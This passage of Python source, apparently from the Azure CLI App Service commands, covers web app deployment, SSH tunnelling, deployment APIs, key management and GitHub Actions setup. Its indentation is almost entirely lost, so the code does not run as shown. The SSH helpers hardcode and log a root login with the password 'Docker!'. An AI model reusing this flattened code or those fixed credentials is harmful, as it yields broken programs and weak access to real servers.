import os
AppServicePlan = cmd.get_models('AppServicePlan')
src_dir = os.getcwd()
_src_path_escaped = "{}".format(src_dir.replace(os.sep, os.sep + os.sep))
client = web_client_factory(cmd.cli_ctx)
user = get_profile_username()
_create_new_rg = False
_site_availability = get_site_availability(cmd, name)
_create_new_app = _site_availability.name_available
os_name = os_type if os_type else detect_os_form_src(src_dir, html)
_is_linux = os_name.lower() == 'linux'
if runtime and html:
raise CLIError('Conflicting parameters: cannot have both --runtime and --html specified.')
if runtime:
helper = _StackRuntimeHelper(cmd, client, linux=_is_linux)
runtime = helper.remove_delimiters(runtime)
match = helper.resolve(runtime)
if not match:
if _is_linux:
raise CLIError("Linux runtime '{}' is not supported."
" Please invoke 'az webapp list-runtimes --linux' to cross check".format(runtime))
raise CLIError("Windows runtime '{}' is not supported."
" Please invoke 'az webapp list-runtimes' to cross check".format(runtime))
language = runtime.split('|')[0]
version_used_create = '|'.join(runtime.split('|')[1:])
detected_version = '-'
else:
# detect the version
_lang_details = get_lang_from_content(src_dir, html)
language = _lang_details.get('language')
_data = get_runtime_version_details(_lang_details.get('file_loc'), language)
version_used_create = _data.get('to_create')
detected_version = _data.get('detected')
runtime_version = "{}|{}".format(language, version_used_create) if \
version_used_create != "-" else version_used_create
site_config = None
if not _create_new_app: # App exists, or App name unavailable
if _site_availability.reason == 'Invalid':
raise CLIError(_site_availability.message)
# Get the ASP & RG info, if the ASP & RG parameters are provided we use those else we need to find those
logger.warning("Webapp '%s' already exists. The command will deploy contents to the existing app.", name)
app_details = get_app_details(cmd, name)
if app_details is None:
raise CLIError("Unable to retrieve details of the existing app '{}'. Please check that the app "
"is a part of the current subscription if updating an existing app. If creating "
"a new app, app names must be globally unique. Please try a more unique name or "
"leave unspecified to receive a randomly generated name.".format(name))
current_rg = app_details.resource_group
if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
raise CLIError("The webapp '{}' exists in ResourceGroup '{}' and does not "
"match the value entered '{}'. Please re-run command with the "
"correct parameters.". format(name, current_rg, resource_group_name))
rg_name = resource_group_name or current_rg
if location is None:
loc = app_details.location.replace(" ", "").lower()
else:
loc = location.replace(" ", "").lower()
plan_details = parse_resource_id(app_details.server_farm_id)
current_plan = plan_details['name']
if plan is not None and current_plan.lower() != plan.lower():
raise CLIError("The plan name entered '{}' does not match the plan name that the webapp is hosted in '{}'."
"Please check if you have configured defaults for plan name and re-run command."
.format(plan, current_plan))
plan = plan or plan_details['name']
plan_info = client.app_service_plans.get(plan_details['resource_group'], plan)
sku = plan_info.sku.name if isinstance(plan_info, AppServicePlan) else 'Free'
current_os = 'Linux' if plan_info.reserved else 'Windows'
# Raise error if current OS of the app is different from the current one
if current_os.lower() != os_name.lower():
raise CLIError("The webapp '{}' is a {} app. The code detected at '{}' will default to "
"'{}'. Please create a new app "
"to continue this operation. For more information on default behaviors, "
"see https://docs.microsoft.com/cli/azure/webapp?view=azure-cli-latest#az_webapp_up."
.format(name, current_os, src_dir, os_name))
_is_linux = plan_info.reserved
# for an existing app check if the runtime version needs to be updated
# Get site config to check the runtime version
site_config = client.web_apps.get_configuration(rg_name, name)
else: # need to create new app, check if we need to use default RG or use user entered values
logger.warning("The webapp '%s' doesn't exist", name)
sku = get_sku_to_use(src_dir, html, sku, runtime)
loc = set_location(cmd, sku, location)
rg_name = get_rg_to_use(user, resource_group_name)
_create_new_rg = not check_resource_group_exists(cmd, rg_name)
plan = get_plan_to_use(cmd=cmd,
user=user,
loc=loc,
sku=sku,
create_rg=_create_new_rg,
resource_group_name=rg_name,
plan=plan)
dry_run_str = r""" {
"name" : "%s",
"appserviceplan" : "%s",
"resourcegroup" : "%s",
"sku": "%s",
"os": "%s",
"location" : "%s",
"src_path" : "%s",
"runtime_version_detected": "%s",
"runtime_version": "%s"
}
""" % (name, plan, rg_name, get_sku_name(sku), os_name, loc, _src_path_escaped, detected_version,
runtime_version)
create_json = json.loads(dry_run_str)
if dryrun:
logger.warning("Web app will be created with the below configuration,re-run command "
"without the --dryrun flag to create & deploy a new app")
return create_json
if _create_new_rg:
logger.warning("Creating Resource group '%s' ...", rg_name)
create_resource_group(cmd, rg_name, loc)
logger.warning("Resource group creation complete")
# create ASP
logger.warning("Creating AppServicePlan '%s' ...", plan)
    # we always call the ASP create-or-update API so that, in case of re-deployment, any updated SKU or plan
    # settings are applied
try:
create_app_service_plan(cmd, rg_name, plan, _is_linux, hyper_v=False, per_site_scaling=False, sku=sku,
number_of_workers=1 if _is_linux else None, location=loc,
app_service_environment=app_service_environment)
except Exception as ex: # pylint: disable=broad-except
if ex.response.status_code == 409: # catch 409 conflict when trying to create existing ASP in diff location
try:
response_content = json.loads(ex.response._content.decode('utf-8')) # pylint: disable=protected-access
except Exception: # pylint: disable=broad-except
raise CLIInternalError(ex)
raise UnclassifiedUserFault(response_content['error']['message'])
raise AzureResponseError(ex)
if _create_new_app:
logger.warning("Creating webapp '%s' ...", name)
create_webapp(cmd, rg_name, name, plan, runtime_version if not html else None,
using_webapp_up=True, language=language)
_configure_default_logging(cmd, rg_name, name)
else: # for existing app if we might need to update the stack runtime settings
helper = _StackRuntimeHelper(cmd, client, linux=_is_linux)
match = helper.resolve(runtime_version)
if os_name.lower() == 'linux' and site_config.linux_fx_version != runtime_version:
if match and site_config.linux_fx_version != match['configs']['linux_fx_version']:
logger.warning('Updating runtime version from %s to %s',
site_config.linux_fx_version, match['configs']['linux_fx_version'])
update_site_configs(cmd, rg_name, name, linux_fx_version=match['configs']['linux_fx_version'])
logger.warning('Waiting for runtime version to propagate ...')
time.sleep(30) # wait for kudu to get updated runtime before zipdeploy. No way to poll for this
elif not match:
logger.warning('Updating runtime version from %s to %s',
site_config.linux_fx_version, runtime_version)
update_site_configs(cmd, rg_name, name, linux_fx_version=runtime_version)
logger.warning('Waiting for runtime version to propagate ...')
time.sleep(30) # wait for kudu to get updated runtime before zipdeploy. No way to poll for this
elif os_name.lower() == 'windows':
        # may need to update stack runtime settings. For node it is site_config.app_settings, otherwise site_config
if match:
_update_app_settings_for_windows_if_needed(cmd, rg_name, name, match, site_config, runtime_version)
create_json['runtime_version'] = runtime_version
# Zip contents & Deploy
logger.warning("Creating zip with contents of dir %s ...", src_dir)
# zip contents & deploy
zip_file_path = zip_contents_from_dir(src_dir, language)
enable_zip_deploy(cmd, rg_name, name, zip_file_path)
if launch_browser:
logger.warning("Launching app using default browser")
view_in_browser(cmd, rg_name, name, None, logs)
else:
_url = _get_url(cmd, rg_name, name)
logger.warning("You can launch the app at %s", _url)
create_json.update({'URL': _url})
if logs:
_configure_default_logging(cmd, rg_name, name)
return get_streaming_log(cmd, rg_name, name)
with ConfiguredDefaultSetter(cmd.cli_ctx.config, True):
cmd.cli_ctx.config.set_value('defaults', 'group', rg_name)
cmd.cli_ctx.config.set_value('defaults', 'sku', sku)
cmd.cli_ctx.config.set_value('defaults', 'appserviceplan', plan)
cmd.cli_ctx.config.set_value('defaults', 'location', loc)
cmd.cli_ctx.config.set_value('defaults', 'web', name)
return create_json
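# For Windows apps, node runtimes are configured through app settings while other stacks are configured through
# site config properties (plus the CURRENT_STACK metadata); only update, and wait for propagation, when needed.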
def _update_app_settings_for_windows_if_needed(cmd, rg_name, name, match, site_config, runtime_version):
update_needed = False
if 'node' in runtime_version:
settings = []
for k, v in match['configs'].items():
for app_setting in site_config.app_settings:
if app_setting.name == k and app_setting.value != v:
update_needed = True
                    settings.append('{}={}'.format(k, v))
if update_needed:
logger.warning('Updating runtime version to %s', runtime_version)
update_app_settings(cmd, rg_name, name, settings=settings, slot=None, slot_settings=None)
else:
for k, v in match['configs'].items():
if getattr(site_config, k, None) != v:
update_needed = True
setattr(site_config, k, v)
if update_needed:
logger.warning('Updating runtime version to %s', runtime_version)
update_site_configs(cmd,
rg_name,
name,
net_framework_version=site_config.net_framework_version,
php_version=site_config.php_version,
python_version=site_config.python_version,
java_version=site_config.java_version,
java_container=site_config.java_container,
java_container_version=site_config.java_container_version)
current_stack = get_current_stack_from_runtime(runtime_version)
_update_webapp_current_stack_property_if_needed(cmd, rg_name, name, current_stack)
if update_needed:
logger.warning('Waiting for runtime version to propagate ...')
time.sleep(30) # wait for kudu to get updated runtime before zipdeploy. No way to poll for this
def _update_webapp_current_stack_property_if_needed(cmd, resource_group, name, current_stack):
if not current_stack:
return
    # the portal uses this current_stack value to display the correct runtime for Windows webapps
client = web_client_factory(cmd.cli_ctx)
app_metadata = client.web_apps.list_metadata(resource_group, name)
if 'CURRENT_STACK' not in app_metadata.properties or app_metadata.properties["CURRENT_STACK"] != current_stack:
app_metadata.properties["CURRENT_STACK"] = current_stack
client.web_apps.update_metadata(resource_group, name, metadata=app_metadata)
def _ping_scm_site(cmd, resource_group, name, instance=None):
from azure.cli.core.util import should_disable_connection_verify
    # wake up Kudu by making an SCM call
    import requests
    # workaround until the timeout-limits issue for Linux is investigated & fixed
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group, name)
scm_url = _get_scm_url(cmd, resource_group, name)
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{}:{}'.format(user_name, password))
cookies = {}
if instance is not None:
cookies['ARRAffinity'] = instance
requests.get(scm_url + '/api/settings', headers=authorization, verify=not should_disable_connection_verify(),
cookies=cookies)
def is_webapp_up(tunnel_server):
return tunnel_server.is_webapp_up()
def get_tunnel(cmd, resource_group_name, name, port=None, slot=None, instance=None):
webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = webapp.reserved
if not is_linux:
raise CLIError("Only Linux App Service Plans supported, Found a Windows App Service Plan")
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
profile_user_name = next(p['userName'] for p in profiles)
profile_user_password = next(p['userPWD'] for p in profiles)
if port is None:
port = 0 # Will auto-select a free port from 1024-65535
logger.info('No port defined, creating on random free port')
# Validate that we have a known instance (case-sensitive)
if instance is not None:
instances = list_instances(cmd, resource_group_name, name, slot=slot)
instance_names = set(i.name for i in instances)
if instance not in instance_names:
if slot is not None:
raise CLIError("The provided instance '{}' is not valid for this webapp and slot.".format(instance))
raise CLIError("The provided instance '{}' is not valid for this webapp.".format(instance))
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
tunnel_server = TunnelServer('', port, scm_url, profile_user_name, profile_user_password, instance)
_ping_scm_site(cmd, resource_group_name, name, instance=instance)
_wait_for_webapp(tunnel_server)
return tunnel_server
def create_tunnel(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None):
tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot, instance)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
logger.warning('Opening tunnel on port: %s', tunnel_server.local_port)
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.remote_debugging_enabled:
logger.warning('Tunnel is ready, connect on port %s', tunnel_server.local_port)
else:
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
logger.warning('SSH is available { username: %s, password: %s }', ssh_user_name, ssh_user_password)
logger.warning('Ctrl + C to close')
if timeout:
time.sleep(int(timeout))
else:
while t.is_alive():
time.sleep(5)
def create_tunnel_and_session(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None):
tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot, instance)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
s = threading.Thread(target=_start_ssh_session,
args=('localhost', tunnel_server.get_port(), ssh_user_name, ssh_user_password))
s.daemon = True
s.start()
if timeout:
time.sleep(int(timeout))
else:
while s.is_alive() and t.is_alive():
time.sleep(5)
def perform_onedeploy(cmd,
resource_group_name,
name,
src_path=None,
src_url=None,
target_path=None,
artifact_type=None,
is_async=None,
restart=None,
clean=None,
ignore_stack=None,
timeout=None,
slot=None):
params = OneDeployParams()
params.cmd = cmd
params.resource_group_name = resource_group_name
params.webapp_name = name
params.src_path = src_path
params.src_url = src_url
params.target_path = target_path
params.artifact_type = artifact_type
params.is_async_deployment = is_async
params.should_restart = restart
params.is_clean_deployment = clean
params.should_ignore_stack = ignore_stack
params.timeout = timeout
params.slot = slot
return _perform_onedeploy_internal(params)
# Class for OneDeploy parameters
# pylint: disable=too-many-instance-attributes,too-few-public-methods
class OneDeployParams:
def __init__(self):
self.cmd = None
self.resource_group_name = None
self.webapp_name = None
self.src_path = None
self.src_url = None
self.artifact_type = None
self.is_async_deployment = None
self.target_path = None
self.should_restart = None
self.is_clean_deployment = None
self.should_ignore_stack = None
self.timeout = None
self.slot = None
# pylint: enable=too-many-instance-attributes,too-few-public-methods
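# Build the Kudu OneDeploy URL (<scm>/api/publish) and append the optional query parameters
# (type, async, restart, clean, ignorestack, path).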
def _build_onedeploy_url(params):
scm_url = _get_scm_url(params.cmd, params.resource_group_name, params.webapp_name, params.slot)
deploy_url = scm_url + '/api/publish?type=' + params.artifact_type
if params.is_async_deployment is not None:
deploy_url = deploy_url + '&async=' + str(params.is_async_deployment)
if params.should_restart is not None:
deploy_url = deploy_url + '&restart=' + str(params.should_restart)
if params.is_clean_deployment is not None:
deploy_url = deploy_url + '&clean=' + str(params.is_clean_deployment)
if params.should_ignore_stack is not None:
deploy_url = deploy_url + '&ignorestack=' + str(params.should_ignore_stack)
if params.target_path is not None:
deploy_url = deploy_url + '&path=' + params.target_path
return deploy_url
def _get_onedeploy_status_url(params):
scm_url = _get_scm_url(params.cmd, params.resource_group_name, params.webapp_name, params.slot)
return scm_url + '/api/deployments/latest'
def _get_basic_headers(params):
import urllib3
user_name, password = _get_site_credential(params.cmd.cli_ctx, params.resource_group_name,
params.webapp_name, params.slot)
if params.src_path:
content_type = 'application/octet-stream'
elif params.src_url:
content_type = 'application/json'
else:
raise CLIError('Unable to determine source location of the artifact being deployed')
headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers['Cache-Control'] = 'no-cache'
headers['User-Agent'] = get_az_user_agent()
headers['Content-Type'] = content_type
return headers
def _get_onedeploy_request_body(params):
import os
if params.src_path:
logger.info('Deploying from local path: %s', params.src_path)
try:
with open(os.path.realpath(os.path.expanduser(params.src_path)), 'rb') as fs:
body = fs.read()
except Exception as e: # pylint: disable=broad-except
raise CLIError("Either '{}' is not a valid local file path or you do not have permissions to access it"
.format(params.src_path)) from e
elif params.src_url:
logger.info('Deploying from URL: %s', params.src_url)
body = json.dumps({
"packageUri": params.src_url
})
else:
raise CLIError('Unable to determine source location of the artifact being deployed')
return body
def _update_artifact_type(params):
import ntpath
if params.artifact_type is not None:
return
# Interpret deployment type from the file extension if the type parameter is not passed
file_name = ntpath.basename(params.src_path)
file_extension = file_name.split(".", 1)[1]
if file_extension in ('war', 'jar', 'ear', 'zip'):
params.artifact_type = file_extension
elif file_extension in ('sh', 'bat'):
params.artifact_type = 'startup'
else:
params.artifact_type = 'static'
logger.warning("Deployment type: %s. To override deloyment type, please specify the --type parameter. "
"Possible values: war, jar, ear, zip, startup, script, static", params.artifact_type)
def _make_onedeploy_request(params):
import requests
from azure.cli.core.util import (
should_disable_connection_verify,
)
# Build the request body, headers, API URL and status URL
body = _get_onedeploy_request_body(params)
headers = _get_basic_headers(params)
deploy_url = _build_onedeploy_url(params)
deployment_status_url = _get_onedeploy_status_url(params)
logger.info("Deployment API: %s", deploy_url)
response = requests.post(deploy_url, data=body, headers=headers, verify=not should_disable_connection_verify())
# For debugging purposes only, you can change the async deployment into a sync deployment by polling the API status
# For that, set poll_async_deployment_for_debugging=True
poll_async_deployment_for_debugging = True
# check the status of async deployment
if response.status_code == 202 or response.status_code == 200:
response_body = None
if poll_async_deployment_for_debugging:
logger.info('Polling the status of async deployment')
response_body = _check_zip_deployment_status(params.cmd, params.resource_group_name, params.webapp_name,
deployment_status_url, headers, params.timeout)
logger.info('Async deployment complete. Server response: %s', response_body)
return response_body
# API not available yet!
if response.status_code == 404:
raise CLIError("This API isn't available in this environment yet!")
# check if there's an ongoing process
if response.status_code == 409:
raise CLIError("Another deployment is in progress. Please wait until that process is complete before "
"starting a new deployment. You can track the ongoing deployment at {}"
.format(deployment_status_url))
    # check if an error occurred during deployment
    if response.status_code:
        raise CLIError("An error occurred during deployment. Status Code: {}, Details: {}"
                       .format(response.status_code, response.text))
# OneDeploy
def _perform_onedeploy_internal(params):
# Update artifact type, if required
_update_artifact_type(params)
# Now make the OneDeploy API call
logger.info("Initiating deployment")
response = _make_onedeploy_request(params)
logger.info("Deployment has completed successfully")
return response
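# Poll the tunnel until the webapp responds, warning on the first attempt and raising after 60 one-second retries.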
def _wait_for_webapp(tunnel_server):
tries = 0
while True:
if is_webapp_up(tunnel_server):
break
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError('SSH timeout, your app must be running before'
' it can accept SSH connections. '
'Use `az webapp log tail` to review the app startup logs.')
tries = tries + 1
logger.warning('.')
time.sleep(1)
def _start_tunnel(tunnel_server):
tunnel_server.start_server()
def _start_ssh_session(hostname, port, username, password):
tries = 0
while True:
try:
c = Connection(host=hostname,
port=port,
user=username,
# connect_timeout=60*10,
connect_kwargs={"password": password})
break
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError("Timeout Error, Unable to establish a connection")
tries = tries + 1
logger.warning('.')
time.sleep(1)
try:
try:
c.run('cat /etc/motd', pty=True)
except invoke.exceptions.UnexpectedExit:
# Don't crash over a non-existing /etc/motd.
pass
c.run('source /etc/profile; exec $SHELL -l', pty=True)
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
finally:
c.close()
def ssh_webapp(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None): # pylint: disable=too-many-statements
import platform
if platform.system() == "Windows":
webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = webapp.reserved
if not is_linux:
raise ValidationError("Only Linux App Service Plans supported, found a Windows App Service Plan")
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
if not instance:
open_page_in_browser(scm_url + '/webssh/host')
else:
open_page_in_browser(scm_url + '/webssh/host?instance={}'.format(instance))
else:
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.remote_debugging_enabled:
raise ValidationError('Remote debugging is enabled, please disable')
create_tunnel_and_session(
cmd, resource_group_name, name, port=port, slot=slot, timeout=timeout, instance=instance)
def _configure_default_logging(cmd, rg_name, name):
logger.warning("Configuring default logging for the app, if not already enabled")
return config_diagnostics(cmd, rg_name, name,
application_logging=True, web_server_logging='filesystem',
docker_container_logging='true')
def _validate_app_service_environment_id(cli_ctx, ase, resource_group_name):
ase_is_id = is_valid_resource_id(ase)
if ase_is_id:
return ase
from azure.cli.core.commands.client_factory import get_subscription_id
return resource_id(
subscription=get_subscription_id(cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Web',
type='hostingEnvironments',
name=ase)
def _format_key_vault_id(cli_ctx, key_vault, resource_group_name):
key_vault_is_id = is_valid_resource_id(key_vault)
if key_vault_is_id:
return key_vault
from azure.cli.core.commands.client_factory import get_subscription_id
return resource_id(
subscription=get_subscription_id(cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.KeyVault',
type='vaults',
name=key_vault)
def _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot=None):
hostname_bindings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_host_name_bindings', slot)
verified_hostname_found = False
for hostname_binding in hostname_bindings:
binding_name = hostname_binding.name.split('/')[-1]
if binding_name.lower() == hostname and (hostname_binding.host_name_type == 'Verified' or
hostname_binding.host_name_type == 'Managed'):
verified_hostname_found = True
return verified_hostname_found
def update_host_key(cmd, resource_group_name, name, key_type, key_name, key_value=None, slot=None):
# pylint: disable=protected-access
key_info = KeyInfo(name=key_name, value=key_value)
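    # Patch the serialization map so the key name and value are nested under 'properties' in the request payload.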
KeyInfo._attribute_map = {
'name': {'key': 'properties.name', 'type': 'str'},
'value': {'key': 'properties.value', 'type': 'str'},
}
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.create_or_update_host_secret_slot(resource_group_name,
name,
key_type,
key_name,
slot, key=key_info)
return client.web_apps.create_or_update_host_secret(resource_group_name,
name,
key_type,
key_name, key=key_info)
def list_host_keys(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_host_keys_slot(resource_group_name, name, slot)
return client.web_apps.list_host_keys(resource_group_name, name)
def delete_host_key(cmd, resource_group_name, name, key_type, key_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_host_secret_slot(resource_group_name, name, key_type, key_name, slot)
return client.web_apps.delete_host_secret(resource_group_name, name, key_type, key_name)
def show_function(cmd, resource_group_name, name, function_name):
client = web_client_factory(cmd.cli_ctx)
result = client.web_apps.get_function(resource_group_name, name, function_name)
if result is None:
return "Function '{}' does not exist in app '{}'".format(function_name, name)
return result
def delete_function(cmd, resource_group_name, name, function_name):
client = web_client_factory(cmd.cli_ctx)
result = client.web_apps.delete_function(resource_group_name, name, function_name)
return result
def update_function_key(cmd, resource_group_name, name, function_name, key_name, key_value=None, slot=None):
# pylint: disable=protected-access
key_info = KeyInfo(name=key_name, value=key_value)
KeyInfo._attribute_map = {
'name': {'key': 'properties.name', 'type': 'str'},
'value': {'key': 'properties.value', 'type': 'str'},
}
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.create_or_update_function_secret_slot(resource_group_name,
name,
function_name,
key_name,
slot,
key_info)
return client.web_apps.create_or_update_function_secret(resource_group_name,
name,
function_name,
key_name,
key_info)
def list_function_keys(cmd, resource_group_name, name, function_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_function_keys_slot(resource_group_name, name, function_name, slot)
return client.web_apps.list_function_keys(resource_group_name, name, function_name)
def delete_function_key(cmd, resource_group_name, name, key_name, function_name=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_function_secret_slot(resource_group_name, name, function_name, key_name, slot)
return client.web_apps.delete_function_secret(resource_group_name, name, function_name, key_name)
def add_github_actions(cmd, resource_group, name, repo, runtime=None, token=None, slot=None, # pylint: disable=too-many-statements,too-many-branches
branch='master', login_with_github=False, force=False):
if not token and not login_with_github:
raise_missing_token_suggestion()
elif not token:
scopes = ["admin:repo_hook", "repo", "workflow"]
token = get_github_access_token(cmd, scopes)
elif token and login_with_github:
logger.warning("Both token and --login-with-github flag are provided. Will use provided token")
# Verify resource group, app
site_availability = get_site_availability(cmd, name)
if site_availability.name_available or (not site_availability.name_available and
site_availability.reason == 'Invalid'):
raise ResourceNotFoundError(
"The Resource 'Microsoft.Web/sites/%s' under resource group '%s' "
"was not found." % (name, resource_group))
app_details = get_app_details(cmd, name)
if app_details is None:
raise ResourceNotFoundError(
"Unable to retrieve details of the existing app %s. Please check that the app is a part of "
"the current subscription" % name)
current_rg = app_details.resource_group
if resource_group is not None and (resource_group.lower() != current_rg.lower()):
raise ResourceNotFoundError("The webapp %s exists in ResourceGroup %s and does not match the "
"value entered %s. Please re-run command with the correct "
"parameters." % (name, current_rg, resource_group))
parsed_plan_id = parse_resource_id(app_details.server_farm_id)
client = web_client_factory(cmd.cli_ctx)
plan_info = client.app_service_plans.get(parsed_plan_id['resource_group'], parsed_plan_id['name'])
is_linux = plan_info.reserved
# Verify github repo
from github import Github, GithubException
from github.GithubException import BadCredentialsException, UnknownObjectException
if repo.strip()[-1] == '/':
repo = repo.strip()[:-1]
g = Github(token)
github_repo = None
try:
github_repo = g.get_repo(repo)
try:
github_repo.get_branch(branch=branch)
except GithubException as e:
error_msg = "Encountered GitHub error when accessing {} branch in {} repo.".format(branch, repo)
if e.data and e.data['message']:
error_msg += " Error: {}".format(e.data['message'])
raise CLIError(error_msg)
logger.warning('Verified GitHub repo and branch')
except BadCredentialsException:
raise CLIError("Could not authenticate to the repository. Please create a Personal Access Token and use "
"the --token argument. Run 'az webapp deployment github-actions add --help' "
"for more information.")
except GithubException as e:
error_msg = "Encountered GitHub error when accessing {} repo".format(repo)
if e.data and e.data['message']:
error_msg += " Error: {}".format(e.data['message'])
raise CLIError(error_msg)
# Verify runtime
app_runtime_info = _get_app_runtime_info(
cmd=cmd, resource_group=resource_group, name=name, slot=slot, is_linux=is_linux)
app_runtime_string = None
    if app_runtime_info and app_runtime_info['display_name']:
app_runtime_string = app_runtime_info['display_name']
github_actions_version = None
    if app_runtime_info and app_runtime_info['github_actions_version']:
github_actions_version = app_runtime_info['github_actions_version']
if runtime and app_runtime_string:
if app_runtime_string.lower() != runtime.lower():
            logger.warning('The app runtime: %s does not match the runtime specified: '
                           '%s. Using the specified runtime %s.', app_runtime_string, runtime, runtime)
app_runtime_string = runtime
elif runtime:
app_runtime_string = runtime
if not app_runtime_string:
raise CLIError('Could not detect runtime. Please specify using the --runtime flag.')
if not _runtime_supports_github_actions(runtime_string=app_runtime_string, is_linux=is_linux):
raise CLIError("Runtime %s is not supported for GitHub Actions deployments." % app_runtime_string)
# Get workflow template
logger.warning('Getting workflow template using runtime: %s', app_runtime_string)
workflow_template = _get_workflow_template(github=g, runtime_string=app_runtime_string, is_linux=is_linux)
# Fill workflow template
guid = str(uuid.uuid4()).replace('-', '')
publish_profile_name = "AzureAppService_PublishProfile_{}".format(guid)
logger.warning(
'Filling workflow template with name: %s, branch: %s, version: %s, slot: %s',
name, branch, github_actions_version, slot if slot else 'production')
completed_workflow_file = _fill_workflow_template(content=workflow_template.decoded_content.decode(), name=name,
branch=branch, slot=slot, publish_profile=publish_profile_name,
version=github_actions_version)
completed_workflow_file = completed_workflow_file.encode()
    # Check if the workflow file already exists in the repo; otherwise create it
if slot:
file_name = "{}_{}({}).yml".format(branch.replace('/', '-'), name.lower(), slot)
else:
file_name = "{}_{}.yml".format(branch.replace('/', '-'), name.lower())
dir_path = "{}/{}".format('.github', 'workflows')
file_path = "/{}/{}".format(dir_path, file_name)
try:
existing_workflow_file = github_repo.get_contents(path=file_path, ref=branch)
existing_publish_profile_name = _get_publish_profile_from_workflow_file(
workflow_file=str(existing_workflow_file.decoded_content))
if existing_publish_profile_name:
completed_workflow_file = completed_workflow_file.decode()
completed_workflow_file = completed_workflow_file.replace(
publish_profile_name, existing_publish_profile_name)
completed_workflow_file = completed_workflow_file.encode()
publish_profile_name = existing_publish_profile_name
logger.warning("Existing workflow file found")
if force:
logger.warning("Replacing the existing workflow file")
github_repo.update_file(path=file_path, message="Update workflow using Azure CLI",
content=completed_workflow_file, sha=existing_workflow_file.sha, branch=branch)
else:
option = prompt_y_n('Replace existing workflow file?')
if option:
logger.warning("Replacing the existing workflow file")
github_repo.update_file(path=file_path, message="Update workflow using Azure CLI",
content=completed_workflow_file, sha=existing_workflow_file.sha,
branch=branch)
else:
logger.warning("Use the existing workflow file")
if existing_publish_profile_name:
publish_profile_name = existing_publish_profile_name
except UnknownObjectException:
logger.warning("Creating new workflow file: %s", file_path)
github_repo.create_file(path=file_path, message="Create workflow using Azure CLI",
content=completed_workflow_file, branch=branch)
# Add publish profile to GitHub
logger.warning('Adding publish profile to GitHub')
_add_publish_profile_to_github(cmd=cmd, resource_group=resource_group, name=name, repo=repo,
token=token, github_actions_secret_name=publish_profile_name,
slot=slot)
# Set site source control properties
_update_site_source_control_properties_for_gh_action(
cmd=cmd, resource_group=resource_group, name=name, token=token, repo=repo, branch=branch, slot=slot)
github_actions_url = "https://github.com/{}/actions".format(repo)
return github_actions_url
def remove_github_actions(cmd, resource_group, name, repo, token=None, slot=None, # pylint: disable=too-many-statements
branch='master', login_with_github=False):
if not token and not login_with_github:
raise_missing_token_suggestion()
elif not token:
scopes = ["admin:repo_hook", "repo", "workflow"]
token = get_github_access_token(cmd, scopes)
elif token and login_with_github:
logger.warning("Both token and --login-with-github flag are provided. Will use provided token")
# Verify resource group, app
site_availability = get_site_availability(cmd, name)
if site_availability.name_available or (not site_availability.name_available and
site_availability.reason == 'Invalid'):
raise CLIError("The Resource 'Microsoft.Web/sites/%s' under resource group '%s' was not found." %
(name, resource_group))
app_details = get_app_details(cmd, name)
if app_details is None:
raise CLIError("Unable to retrieve details of the existing app %s. "
"Please check that the app is a part of the current subscription" % name)
current_rg = app_details.resource_group
if resource_group is not None and (resource_group.lower() != current_rg.lower()):
raise CLIError("The webapp %s exists in ResourceGroup %s and does not match "
"the value entered %s. Please re-run command with the correct "
"parameters." % (name, current_rg, resource_group))
# Verify github repo
from github import Github, GithubException
from github.GithubException import BadCredentialsException, UnknownObjectException
if repo.strip()[-1] == '/':
repo = repo.strip()[:-1]
g = Github(token)
github_repo = None
try:
github_repo = g.get_repo(repo)
try:
github_repo.get_branch(branch=branch)
except GithubException as e:
error_msg = "Encountered GitHub error when accessing {} branch in {} repo.".format(branch, repo)
if e.data and e.data['message']:
error_msg += " Error: {}".format(e.data['message'])
raise CLIError(error_msg)
logger.warning('Verified GitHub repo and branch')
except BadCredentialsException:
raise CLIError("Could not authenticate to the repository. Please create a Personal Access Token and use "
"the --token argument. Run 'az webapp deployment github-actions add --help' "
"for more information.")
except GithubException as e:
error_msg = "Encountered GitHub error when accessing {} repo".format(repo)
if e.data and e.data['message']:
error_msg += " Error: {}".format(e.data['message'])
raise CLIError(error_msg)
# Check if workflow exists in repo and remove
file_name = "{}_{}({}).yml".format(
branch.replace('/', '-'), name.lower(), slot) if slot else "{}_{}.yml".format(
branch.replace('/', '-'), name.lower())
dir_path = "{}/{}".format('.github', 'workflows')
file_path = "/{}/{}".format(dir_path, file_name)
existing_publish_profile_name = None
try:
existing_workflow_file = github_repo.get_contents(path=file_path, ref=branch)
existing_publish_profile_name = _get_publish_profile_from_workflow_file(
workflow_file=str(existing_workflow_file.decoded_content))
